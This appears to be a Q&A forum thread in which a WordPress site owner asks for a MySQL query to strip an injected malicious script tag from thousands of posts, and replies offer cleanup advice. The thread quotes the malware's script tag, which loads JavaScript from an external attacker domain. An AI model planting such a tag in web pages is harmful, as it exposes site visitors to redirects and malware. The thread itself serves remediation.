# The Wordpress website got hacked, I need a query to remove the script between the code

Tags: mysql, wordpress

I am using WordPress website, My website got hacked and I got below  script code in all the post

> Blockquote

```
<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>
```

Can anyone help me with a query to remove this code
I tried the below code but it's not working. I am getting zero rows affected.

```
Update wp_posts set post_content = replace(post_content, "<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>", "") where post_content like "%<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>%"
```

I have more than 8k records and I am sharing one-row value. Check at the end of the code i got script.

```
[vc_row css=".vc_custom_1553586206091{padding-top: 50px !important;padding-bottom: 50px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/1161465.jpg?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}" el_class="red-overlay"][vc_column][vc_custom_heading text="" font_container="tag:h2|font_size:50px|text_align:center|color:%23ffffff" use_theme_fonts="yes" el_class="extrabold" css=".vc_custom_1553586443111{margin-bottom: 0px !important;padding-bottom: 0px !important;}"][vc_column_text el_class="banner_para"]
[/vc_column_text][vc_wp_search el_id="bannerSearch"][/vc_column][/vc_row][vc_row full_width="stretch_row_content" css=".vc_custom_1553588147048{padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/asd?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}"][vc_column width="8/12" el_class="red-overlay"][/vc_column][vc_column width="4/12"][/vc_column][/vc_row]<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>
```

Comment: In your `replace` function you have a smart quote before `https:` both times. Try fixing that and try it agaain

Comment: Carefull using NoN Ascii quotes like `‘` it does not `=` the Ascii `'`

Comment: @disinfor, I haven't undersood your point

Comment: Change `src=‘https:` to `src='https:` That quote is not legal

Comment: @RiggsFolly, Yes row updated..Let me check the data

Comment: Your safest bet is to completely reinstall from scratch. You might miss any backdoors that were installed otherwise.

Comment: Yes, It's working. I don't understand .This is my third time website hacked with same script.

Comment: Can any one assist me the best wordpress pluing for this

Comment: @user9437856 you shouldn't rely on just a plugin - but I would recommend iThemes Security: https://wordpress.org/plugins/better-wp-security/

Comment: @disinfor, thanks for the reply, I'll discuss this with my team ASAP.  As os now I am using wordreference plugin.

Comment: "*This is my third time website hacked with same script*" - my guess is that, rather than been hacked multiple times,  you are not cleaning the malware from your website completely. It is *incredibly difficult* to clean malware from a website, as it can infect everything from the code in your theme and plugins to the database itself. The safest option is to roll back to the last clean backup you have - especially as you have had ongoing issues trying to clear this malware.

Comment: @FluffyKitten, I can't rollback because my teams are always working on the website. I have a backup but that's not a completely. But my issue got resolve useing above query. Now I have backup.

Comment: If you're regularly updating the website, you could do a diff against your VCS to see what files may be getting changed.

Comment: @fubar, I think there is some issue with plugin. not sure... Thanks for suggestion.

Answer (score 0):

Got the same problem, I currently replaced the URL in src field with the plugin "Velvet Blues Update URLs", so the JavaScript file can't run.

```
<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>
```

is now

```
<script src='#' type=text/javascript></script>
```

I know it isn't the best option, but it gives me time to look for a better solution and dig deeper.

Comment: I removed my script from the wp_post using the above query. I have more than 8k records. So I prefer the query

Answer (score 0):

What i've done is exporting the database (affected tables) to file, used notepad++ to "find and replace" it.
Dropped the table from the db and re-imported the wp_posts table

These are the tables that were affected:
wp_options (siteurl and home)
wp_posts multiple locations (in my case 2086 replaces)

Hope you get it fixed

Comment: What I did, I just run my query and that remove the script from the post_content and it was working perfectly.

Answer (score 0):

In my case both backend and frontend were not working. So first I fixed my backend by changing site url in wp-options
After then I used WordFence security plugin to scan infected files. Deleted the infected files and the site is fine now.
[enter image description here](https://i.stack.imgur.com/JzUbQ.png)

Comment: My  site url was ok at that time but some time site URL was also updating. Do you have any idea why this happening?

Answer (score 0):

I analyzed this malware some weeks ago it’s very invasive it can infect all js, php, html files and all articles in the database of your WordPress. In some cases the home_url and site_url of your website are replaced by the malware domain causing redirections.

So generally more than 2000 files are infected it’s really hard to clean all of that manually, and if you forgot one file all the files are infected again..

But luckily I made a script to easily detect and fix infected files and database:

https://github.com/Guiomuh/WP_Redirect_Botnet_Cleaner

Comment: What I did, I just run the above query. It will remove the script from all the posts.